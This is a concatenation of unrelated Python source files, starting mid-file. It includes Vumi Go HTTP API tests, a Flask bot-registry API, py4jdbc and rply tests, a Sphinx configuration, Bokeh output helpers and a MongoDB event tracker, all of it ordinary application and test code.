        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        with LogCatcher(message='Got unexpected response code') as lc:
            msg_d = self.app_helper.make_dispatch_inbound(
                'in 1', message_id='1', conv=self.conversation)
            req = yield self.push_calls.get()
            req.setResponseCode(201)
            req.finish()
            yield msg_d
        self.assertEqual(lc.messages(), [])

    @inlineCallbacks
    def test_post_inbound_message_500_response(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_message_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        with LogCatcher(message='Got unexpected response code') as lc:
            msg_d = self.app_helper.make_dispatch_inbound(
                'in 1', message_id='1', conv=self.conversation)
            req = yield self.push_calls.get()
            req.setResponseCode(500)
            req.finish()
            yield msg_d
        [warning_log] = lc.messages()
        self.assertTrue(self.mock_push_server.url in warning_log)
        self.assertTrue('500' in warning_log)

    @inlineCallbacks
    def test_post_inbound_event(self):
        # Set the URL so stuff is HTTP Posted instead of streamed.
        self.conversation.config['http_api'].update({
            'push_event_url': self.mock_push_server.url,
        })
        yield self.conversation.save()

        msg = yield self.app_helper.make_stored_outbound(
            self.conversation, 'out 1', message_id='1')
        event_d = self.app_helper.make_dispatch_ack(
            msg, conv=self.conversation)

        req = yield self.push_calls.get()
        posted_json_data = req.content.read()
        req.finish()
        ack = yield event_d

        self.assertEqual(TransportEvent.from_json(posted_json_data), ack)

    @inlineCallbacks
    def test_bad_urls(self):
        def assert_not_found(url, headers={}):
            d = http_request_full(self.url, method='GET', headers=headers)
            d.addCallback(lambda r: self.assertEqual(r.code, http.NOT_FOUND))
            return d

        yield assert_not_found(self.url)
        yield assert_not_found(self.url + '/')
        yield assert_not_found('%s/%s' % (self.url, self.conversation.key),
                               headers=self.auth_headers)
        yield assert_not_found('%s/%s/' % (self.url, self.conversation.key),
                               headers=self.auth_headers)
        yield assert_not_found('%s/%s/foo' % (self.url, self.conversation.key),
                               headers=self.auth_headers)

    @inlineCallbacks
    def test_send_message_command(self):
        yield self.app_helper.dispatch_command(
            'send_message',
            user_account_key=self.conversation.user_account.key,
            conversation_key=self.conversation.key,
            command_data={
                u'batch_id': u'batch-id',
                u'content': u'foo',
                u'to_addr': u'to_addr',
                u'msg_options': {
                    u'helper_metadata': {
                        u'tag': {
                            u'tag': [u'longcode', u'default10080']
                        }
                    },
                    u'from_addr': u'default10080',
                }
            })

        [msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(msg.payload['to_addr'], "to_addr")
        self.assertEqual(msg.payload['from_addr'], "default10080")
        self.assertEqual(msg.payload['content'], "foo")
        self.assertEqual(msg.payload['message_type'], "user_message")
        self.assertEqual(
            msg.payload['helper_metadata']['go']['user_account'],
            self.conversation.user_account.key)
        self.assertEqual(
            msg.payload['helper_metadata']['tag']['tag'],
            ['longcode', 'default10080'])

    @inlineCallbacks
    def test_process_command_send_message_in_reply_to(self):
        msg = yield self.app_helper.make_stored_inbound(
            self.conversation, "foo")
        yield self.app_helper.dispatch_command(
            'send_message',
            user_account_key=self.conversation.user_account.key,
            conversation_key=self.conversation.key,
            command_data={
                u'batch_id': u'batch-id',
                u'content': u'foo',
                u'to_addr': u'to_addr',
                u'msg_options': {
                    u'helper_metadata': {
                        u'tag': {
                            u'tag': [u'longcode', u'default10080']
                        }
                    },
                    u'transport_name': u'smpp_transport',
                    u'in_reply_to': msg['message_id'],
                    u'transport_type': u'sms',
                    u'from_addr': u'default10080',
                }
            })
        [sent_msg] = self.app_helper.get_dispatched_outbound()
        self.assertEqual(sent_msg['to_addr'], msg['from_addr'])
        self.assertEqual(sent_msg['content'], 'foo')
        self.assertEqual(sent_msg['in_reply_to'], msg['message_id'])

from flask import request, current_app, url_for
from flask_jsonschema import validate
from .. import db
from ..models import AHBot as Bot
from .decorators import json_response
from . import api


@api.route('/abusehelper', methods=['GET'])
@json_response
def get_abusehelper():
    """Return a list of available abusehelper

    **Example request**:

    .. sourcecode:: http

        GET /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "abusehelper": [
            {
              "name": "ShadowServerBot",
              "url": "http://sample.com/path.html",
              "id": 1
            }
          ]
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json array abusehelper: List of available bots
    :>jsonobj integer id: Bot ID
    :>jsonobj integer name: Bot name

    :status 200: Deliverable endpoint found, response may be empty
    :status 404: Not found
    """
    bots = Bot.query.filter().all()
    return {'abusehelper': [a.serialize() for a in bots]}


@api.route('/abusehelper/<int:bot_id>', methods=['GET'])
@json_response
def get_got(bot_id):
    """Get bot from database

    **Example request**:

    .. sourcecode:: http

        GET /api/1.0/abusehelper/1 HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "name": "ShadowServerBot",
          "url": "http://sample.com/path.html",
          "id": 1
        }

    :param bot_id: Bot unique ID

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json integer id: Bot unique ID
    :>json integer name: Bot name

    :status 200: ASN found
    :status 404: Resource not found
    """
    a = Bot.query.get_or_404(bot_id)
    return a.serialize()


@api.route('/abusehelper', methods=['POST', 'PUT'])
@validate('abusehelper', 'add_bot')
@json_response
def add_bot():
    """Add new bot entry

    **Example request**:

    .. sourcecode:: http

        POST /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json
        Content-Type: application/json

        {
          "name": "ShadowServerBot",
          "url": "http://sample.com/path.html"
        }

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 201 CREATED
        Content-Type: application/json

        {
          "bot": {
            "name": "ShadowServerBot",
            "url": "http://sample.com/path.html",
            "id": 1
          },
          'message': "Bot added"
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :<json integer name: Bot name
    :>jsonobj integer id: Unique ID of new bot
    :>jsonobj integer name: bot name
    :>json string message: Status message

    :status 201: ASN successfully saved
    :status 400: Bad request
    """
    a = Bot.fromdict(request.json)
    db.session.add(a)
    db.session.commit()
    return {'bot': a.serialize(), 'message': 'Bot added'}, 201, \
           {'Location': url_for('api.get_bot', bot_id=a.id)}


@api.route('/abusehelper/<int:bot_id>', methods=['PUT'])
@validate('abusehelper', 'update_bot')
@json_response
def update_bot(bot_id):
    return NotImplemented


@api.route('/abusehelper/<int:bot_id>', methods=['DELETE'])
@json_response
def delete_bot(bot_id):
    """Delete bot

    **Example request**:

    .. sourcecode:: http

        DELETE /api/1.0/abusehelper/1 HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "message": "Bot deleted"
        }

    :param bot_id: Bot unique ID.

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json string message: Action status status

    :status 200: Bot was deleted
    :status 404: Bot was not found
    """
    a = Bot.query.filter_by(id == bot_id).delete()
    if not a:
        return {'message': 'No such bot'}, 404
    db.session.commit()
    return {'message': 'Bot deleted'}


@api.route('/abusehelper', methods=['DELETE'])
@json_response
def delete_abusehelper():
    """Clear abusehelper table

    **Example request**:

    .. sourcecode:: http

        DELETE /api/1.0/abusehelper HTTP/1.1
        Host: do.cert.europa.eu
        Accept: application/json

    **Example response**:

    .. sourcecode:: http

        HTTP/1.0 200 OK
        Content-Type: application/json

        {
          "message": "Bots deleted"
        }

    :reqheader Accept: Content type(s) accepted by the client
    :resheader Content-Type: this depends on `Accept` header or request

    :>json string message: Action status status

    :status 200: Bot was deleted
    :status 404: Bot was not found
    """
    a = Bot.query.all().delete()
    db.session.commit()
    current_app.log.debug('Deleted {} abusehelper'.format(a))
    return {'message': 'Bots deleted'}

from django.contrib import admin

# Register your models here.
from .models import Photos 
admin.site.register(Photos)
# Copyright (c) 2014, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license.  The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.

""" Tests for the BetterZoom Chaco tool """

import unittest

import numpy

from chaco.api import create_line_plot
from chaco.tools.api import BetterZoom
from enable.testing import EnableTestAssistant


class TestBetterZoomTool(EnableTestAssistant, unittest.TestCase):
    """ Tests for the BetterZoom Chaco tool """

    def setUp(self):
        values = numpy.arange(10)
        self.plot = create_line_plot((values, values))
        self.plot.bounds = [100, 100]
        self.plot._window = self.create_mock_window()
        self.tool = BetterZoom(component=self.plot)
        self.plot.active_tool = self.tool
        self.plot.do_layout()

    def tearDown(self):
        del self.tool
        del self.plot

    def test_default_position(self):
        tool = self.tool

        # this doesn't throw an exception
        self.send_key(tool, '+')

        self.assertEqual(tool.position, (50, 50))

        # expected behaviour for a normal zoom in operation
        self.assertNotEqual(tool._index_factor, 1.0)
        self.assertNotEqual(tool._value_factor, 1.0)
        self.assertEqual(len(tool._history), 2)

import pytest

from py4jdbc.dbapi2 import connect, Connection
from py4jdbc.resultset import ResultSet
from py4jdbc.exceptions.dbapi2 import Error


def test_connect(gateway):
    url = "jdbc:derby:memory:testdb;create=true"
    conn = connect(url, gateway=gateway)
    cur = conn.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert isinstance(rs, ResultSet)


def test_execute(derby):
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert isinstance(rs, ResultSet)


def test_execute_with_params(derby):
    derby.autocommit = False
    cur = derby.cursor()
    cur.execute("create schema x_with_params")
    cur.execute("create table x_with_params.cowtest(a int, b char(1))")
    # Verify table is empty.
    rows = cur.execute("select * from x_with_params.cowtest as r").fetchall()
    assert len(rows) == 0
    # Insert one with parameter binding..
    sql = "insert into x_with_params.cowtest (a, b) values (?, ?)"
    cur.execute(sql, (12, "m"))
    # Verify there's 1 row.
    rows = cur.execute("select * from x_with_params.cowtest as r").fetchall()
    assert len(rows) == 1
    # Insert a bunch.
    params = list(enumerate("thecowsaremooing"))
    cur.executemany(sql, params)
    rows = cur.execute("select * from x_with_params.cowtest as r").fetchall()
    assert len(rows) == len("thecowsaremooing") + 1
    derby.rollback()
    derby.autocommit = True


def test_fetchone(derby):
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert isinstance(rs.fetchone(), rs.Row)


def test_fetchmany(derby):
    '''Assert all rows of result set have the correct class.
    '''
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert all({isinstance(row, rs.Row) for row in rs.fetchmany(5)})


def test_fetchManyCount(derby):
    derby.autocommit = False
    cur = derby.cursor()
    cur.execute("create schema x_with_params")
    cur.execute("create table x_with_params.cowtest(a int, b char(1))")
    sql = "insert into x_with_params.cowtest (a, b) values (?, ?)"
    params = list(enumerate("thecowsaremooing"))
    cur.executemany(sql, params)
    rs = cur.execute("select a from x_with_params.cowtest")
    ress = []
    while True:
        x = rs.fetchmany(3)
        ress.append(x)
        if len(x) < 3:
            break
    derby.rollback()
    derby.autocommit = True
    assert sum(map(len, ress)) == len("thecowsaremooing")


def test_fetchall(derby):
    '''Assert all rows of result set have the correct class.
    '''
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert all({isinstance(row, rs.Row) for row in rs.fetchall()})


def test_Cursor__iter__(derby):
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    assert all({isinstance(row, rs.Row) for row in rs})


def test_Cursor__iter__(derby):
    cur = derby.cursor()
    rs = cur.execute("select * from SYS.SYSTABLES")
    # Exhaust all rows.
    list(rs)
    assert rs.fetchone() == None


def test_close_and_execute(derby):
    cur = derby.cursor()
    cur.close()
    with pytest.raises(Error):
        cur.execute("select * from SYS.SYSTABLES")


def test_close_and_fetchone(derby):
    cur = derby.cursor()
    cur.execute("select * from SYS.SYSTABLES")
    cur.close()
    with pytest.raises(Error):
        cur.fetchone()


def test_close_twice(derby):
    cur = derby.cursor()
    cur.close()
    with pytest.raises(Error):
        cur.close()



"""Unit-tests for `tree.visitors`
"""

from py2c import tree
from py2c.tree import visitors

from py2c.tests import Test, data_driven_test
from nose.tools import assert_equal


# TEST:: Add non-node fields

# =============================================================================
# Helper classes
# =============================================================================
class BasicNode(tree.Node):
    _fields = []


class BasicNodeReplacement(tree.Node):
    _fields = []


class BasicNodeWithListReplacement(tree.Node):
    _fields = []


class BasicNodeDeletable(tree.Node):
    _fields = []


class ParentNode(tree.Node):
    _fields = [
        ('child', tree.Node, 'OPTIONAL'),
    ]


class ParentNodeWithChildrenList(tree.Node):
    """Node with list of nodes as field
    """
    _fields = [
        ('child', tree.Node, 'ZERO_OR_MORE'),
    ]


# -----------------------------------------------------------------------------
# Concrete Visitors used for testing
# -----------------------------------------------------------------------------
class VisitOrderCheckingVisitor(visitors.RecursiveNodeVisitor):

    def __init__(self):
        super().__init__()
        self.visited = []

    def generic_visit(self, node):
        self.visited.append(node.__class__.__name__)
        super().generic_visit(node)

    def visit_BasicNodeReplacement(self, node):
        self.visited.append("visited Copy!")


class AccessPathCheckingVisitor(visitors.RecursiveNodeVisitor):

    def __init__(self):
        super().__init__()
        self.recorded_access_path = None

    def visit_BasicNode(self, node):
        self.recorded_access_path = self.access_path[:]


class EmptyTransformer(visitors.RecursiveNodeTransformer):
    pass


class VisitOrderCheckingTransformer(visitors.RecursiveNodeTransformer):

    def __init__(self):
        super().__init__()
        self.visited = []

    def generic_visit(self, node):
        self.visited.append(node.__class__.__name__)
        return super().generic_visit(node)

    def visit_BasicNodeReplacement(self, node):
        self.visited.append("visited Copy!")
        return node


class AccessPathCheckingTransformer(visitors.RecursiveNodeTransformer):

    def __init__(self):
        super().__init__()
        self.recorded_access_path = None

    def visit_BasicNode(self, node):
        self.recorded_access_path = self.access_path[:]
        return node


class TransformationCheckingTransformer(visitors.RecursiveNodeTransformer):

    def visit_BasicNode(self, node):
        return BasicNodeReplacement()

    def visit_BasicNodeDeletable(self, node):
        return None  # Delete this node

    def visit_BasicNodeReplacement(self, node):
        return self.NONE_DEPUTY  # Replace this node with None

    def visit_BasicNodeWithListReplacement(self, node):
        return [BasicNode(), BasicNodeReplacement()]


# -----------------------------------------------------------------------------
# Tests
# -----------------------------------------------------------------------------
class TestRecursiveASTVisitor(Test):
    """py2c.tree.visitors.RecursiveNodeVisitor
    """
    context = globals()

    @data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
    def test_visit_order(self, node, order):
        to_visit = self.load(node)

        # The main stuff
        visitor = VisitOrderCheckingVisitor()
        retval = visitor.visit(to_visit)

        assert_equal(retval, None)
        assert_equal(visitor.visited, order)

    @data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
    def test_access_path(self, node, access):
        to_visit = self.load(node)
        access_path = self.load(access)

        # The main stuff
        visitor = AccessPathCheckingVisitor()
        retval = visitor.visit(to_visit)

        assert_equal(retval, None)
        assert_equal(visitor.recorded_access_path, access_path)


class TestRecursiveASTTransformer(Test):
    """py2c.tree.visitors.RecursiveNodeTransformer
    """
    context = globals()

    @data_driven_test("visitors-visitor_order.yaml", prefix="empty transformer does not transform ")
    def test_empty_transformer(self, node, order):
        to_visit = self.load(node)

        # The main stuff
        visitor = EmptyTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(to_visit, retval)

    @data_driven_test("visitors-visitor_order.yaml", prefix="visit order of ")
    def test_visit_order(self, node, order):
        to_visit = self.load(node)

        # The main stuff
        visitor = VisitOrderCheckingTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(to_visit, retval)
        assert_equal(visitor.visited, order)

    @data_driven_test("visitors-access_path.yaml", prefix="access path on visit of ")
    def test_access_path(self, node, access):
        to_visit = self.load(node)
        access_path = self.load(access)

        # The main stuff
        visitor = AccessPathCheckingTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(retval, to_visit)
        assert_equal(visitor.recorded_access_path, access_path)

    @data_driven_test("visitors-transform.yaml", prefix="transformation of ")
    def test_transformation(self, node, expected):
        to_visit = self.load(node)
        expected_node = self.load(expected)

        # The main stuff
        visitor = TransformationCheckingTransformer()
        retval = visitor.visit(to_visit)

        assert_equal(retval, expected_node)


if __name__ == '__main__':
    from py2c.tests import runmodule
    runmodule()

from importlib import import_module
from inspect import getdoc

def attribs(name):
    mod = import_module(name)
    print name
    print 'Has __all__?', hasattr(mod, '__all__')    
    print 'Has __doc__?', hasattr(mod, '__doc__')
    print 'doc: ', getdoc(mod)

if __name__=='__main__':
    attribs('cairo')
    attribs('zope')
    attribs('A.B.C')
    
    import hacked
    class Object(object):
        pass
    
    opt = Object()
    opt.ignore_errors = False
    a, d = hacked.get_all_attr_has_docstr('/home/ali/ws-pydev/apidocfilter/A/B', 
                                         '/home/ali/ws-pydev/apidocfilter/A/B/C',
                                         opt)
    print(a)
    print(d)


class Requirement(object):
    """
    Requirements are the basis for Dominion. They define
    what needs to exist on a host/role, or perhaps what *mustn't* exist.

    Requirements are defined on Roles.
    """
    creation_counter = 0

    "The base class for requirements."
    def __init__(self, required=True, ensure=None, depends=None, post=None):
        self.required = required
        self.ensure = ensure or "exists"
        self.depends = depends or ()
        if self.ensure == "removed":
            self.required = False
        self.post = post or ()

        # Increase the creation counter, and save our local copy.
        self.creation_counter = Requirement.creation_counter
        Requirement.creation_counter += 1

    def __call__(self):
        self.apply()

    def apply(self):
        if self.ensure == "exists" or self.required:
            if hasattr(self, 'install'):
                return self.install()
        if self.ensure == "removed":
            if hasattr(self, 'uninstall'):
                return self.uninstall()

import py

try:
    from pypy.rpython.test.test_llinterp import interpret
except ImportError:
    py.test.skip('Needs PyPy to be on the PYTHONPATH')

from rply import ParserGenerator, Token
from rply.errors import ParserGeneratorWarning

from .base import BaseTests
from .utils import FakeLexer, BoxInt, ParserState


class TestTranslation(BaseTests):
    def run(self, func, args):
        return interpret(func, args)

    def test_basic(self):
        pg = ParserGenerator(["NUMBER", "PLUS"])

        @pg.production("main : expr")
        def main(p):
            return p[0]

        @pg.production("expr : expr PLUS expr")
        def expr_op(p):
            return BoxInt(p[0].getint() + p[2].getint())

        @pg.production("expr : NUMBER")
        def expr_num(p):
            return BoxInt(int(p[0].getstr()))

        with self.assert_warns(ParserGeneratorWarning, "1 shift/reduce conflict"):
            parser = pg.build()

        def f(n):
            return parser.parse(FakeLexer([
                Token("NUMBER", str(n)),
                Token("PLUS", "+"),
                Token("NUMBER", str(n))
            ])).getint()

        assert self.run(f, [12]) == 24

    def test_state(self):
        pg = ParserGenerator(["NUMBER", "PLUS"], precedence=[
            ("left", ["PLUS"]),
        ])

        @pg.production("main : expression")
        def main(state, p):
            state.count += 1
            return p[0]

        @pg.production("expression : expression PLUS expression")
        def expression_plus(state, p):
            state.count += 1
            return BoxInt(p[0].getint() + p[2].getint())

        @pg.production("expression : NUMBER")
        def expression_number(state, p):
            state.count += 1
            return BoxInt(int(p[0].getstr()))

        parser = pg.build()

        def f():
            state = ParserState()
            return parser.parse(FakeLexer([
                Token("NUMBER", "10"),
                Token("PLUS", "+"),
                Token("NUMBER", "12"),
                Token("PLUS", "+"),
                Token("NUMBER", "-2"),
            ]), state=state).getint() + state.count

        assert self.run(f, []) == 26

# -*- coding: utf-8 -*-
#
# zambiaureport documentation build configuration file, created by
# sphinx-quickstart.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

import sys, os

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))

# -- General configuration -----------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix of source filenames.
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'zambiaureport'
copyright = u'2014, Andre Lesa'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []


# -- Options for HTML output ---------------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
html_theme = 'default'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents.  If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar.  Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs.  This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it.  The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Output file base name for HTML help builder.
htmlhelp_basename = 'zambiaureportdoc'


# -- Options for LaTeX output --------------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
  ('index', 'zambiaureport.tex', u'zambiaureport Documentation',
   u'Andre Lesa', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True


# -- Options for manual page output --------------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'zambiaureport', u'zambiaureport Documentation',
     [u'Andre Lesa'], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False


# -- Options for Texinfo output ------------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
  ('index', 'zambiaureport', u'zambiaureport Documentation',
   u'Andre Lesa', 'zambiaureport',
   'Zambia U-Report reference implementation.','Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
'''

'''

#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)

#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------

# Bokeh imports
from .notebook import run_notebook_hook
from .state import curstate

#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------

__all__ = (
    'output_file',
    'output_notebook',
    'reset_output',
)

#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------

def output_file(filename, title="Bokeh Plot", mode=None, root_dir=None):
    '''Configure the default output state to generate output saved
    to a file when :func:`show` is called.

    Does not change the current ``Document`` from ``curdoc()``. File and notebook
    output may be active at the same time, so e.g., this does not clear the
    effects of ``output_notebook()``.

    Args:
        filename (str) : a filename for saving the HTML document

        title (str, optional) : a title for the HTML document (default: "Bokeh Plot")

        mode (str, optional) : how to include BokehJS (default: ``'cdn'``)
            One of: ``'inline'``, ``'cdn'``, ``'relative(-dev)'`` or
            ``'absolute(-dev)'``. See :class:`bokeh.resources.Resources` for more details.

        root_dir (str, optional) : root directory to use for 'absolute' resources. (default: None)
            This value is ignored for other resource types, e.g. ``INLINE`` or
            ``CDN``.

    Returns:
        None

    .. note::
        Generally, this should be called at the beginning of an interactive
        session or the top of a script.

    .. warning::
        This output file will be overwritten on every save, e.g., each time
        show() or save() is invoked.

    '''
    curstate().output_file(
        filename,
        title=title,
        mode=mode,
        root_dir=root_dir
    )

def output_notebook(resources=None, verbose=False, hide_banner=False, load_timeout=5000, notebook_type='jupyter'):
    ''' Configure the default output state to generate output in notebook cells
    when :func:`show` is called. Note that, :func:`show` may be called multiple
    times in a single cell to display multiple objects in the output cell. The
    objects will be displayed in order.

    Args:
        resources (Resource, optional) :
            How and where to load BokehJS from (default: CDN)

        verbose (bool, optional) :
            whether to display detailed BokehJS banner (default: False)

        hide_banner (bool, optional):
            whether to hide the Bokeh banner (default: False)

        load_timeout (int, optional) :
            Timeout in milliseconds when plots assume load timed out (default: 5000)

        notebook_type (string, optional):
            Notebook type (default: jupyter)

    Returns:
        None

    .. note::
        Generally, this should be called at the beginning of an interactive
        session or the top of a script.

    '''
    # verify notebook_type first in curstate().output_notebook
    curstate().output_notebook(notebook_type)
    run_notebook_hook(notebook_type, 'load', resources, verbose, hide_banner, load_timeout)

def reset_output(state=None):
    ''' Clear the default state of all output modes.

    Returns:
        None

    '''
    curstate().reset()

#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------

#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------

#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------

from django import template

from django.utils.safestring import mark_safe
from mezzanine.conf import settings

from mezzanine_developer_extension.utils import refactor_html


register = template.Library()

# Checking settings.TEMPLATE_STYLE.
# Possible values are:
#   - mezzanine_developer_extension.styles.macos
#   - mezzanine_developer_extension.styles.ubuntu
#   - mezzanine_developer_extension.styles.windows
_prefix = "mezzanine_developer_extension.styles"
try:
    if settings.TERMINAL_STYLE not in \
     ["%s.macos" % _prefix, "%s.ubuntu" % _prefix, "%s.windows" % _prefix]:
        # If the user has specified a wrong terminal styling format, we
        # raise an exception warning about this.
        msg = "Wrong terminal style format. Check the value of TERMINAL_STYLE"\
              " in your settings.py file."
        raise Exception(msg)

except AttributeError:
    msg = "You have not specified a terminal output format. You have to"\
          " define the attribute TERMINAL_STYLE in your settings.py"
    raise Exception(msg)


@register.filter(name='safe_developer')
def safe_developer(content, style="macos"):
    """
    Renders content without cleaning the original.
    Replaces the terminal divs for a more complext html layout.
    """
    new_content = refactor_html(content, style)
    return mark_safe(new_content)
from datetime import datetime

from pymongo.connection import Connection

from django.db import models

from eventtracker.conf import settings

def get_mongo_collection():
    "Open a connection to MongoDB and return the collection to use."
    if settings.RIGHT_MONGODB_HOST:
        connection = Connection.paired(
                left=(settings.MONGODB_HOST, settings.MONGODB_PORT),
                right=(settings.RIGHT_MONGODB_HOST, settings.RIGHT_MONGODB_PORT)
            )
    else:
        connection = Connection(host=settings.MONGODB_HOST, port=settings.MONGODB_PORT)
    return connection[settings.MONGODB_DB][settings.MONGODB_COLLECTION]
    

def save_event(collection, event, timestamp, params):
    "Save the event in MongoDB collection"
    collection.insert({
        'event': event,
        'timestamp': datetime.fromtimestamp(timestamp),
        'params': params
    }) 

class Event(models.Model):
    "Dummy model for development."
    timestamp = models.DateTimeField(auto_now_add=True)
    event = models.SlugField()
    params = models.TextField()

# encoding: utf-8

import sys
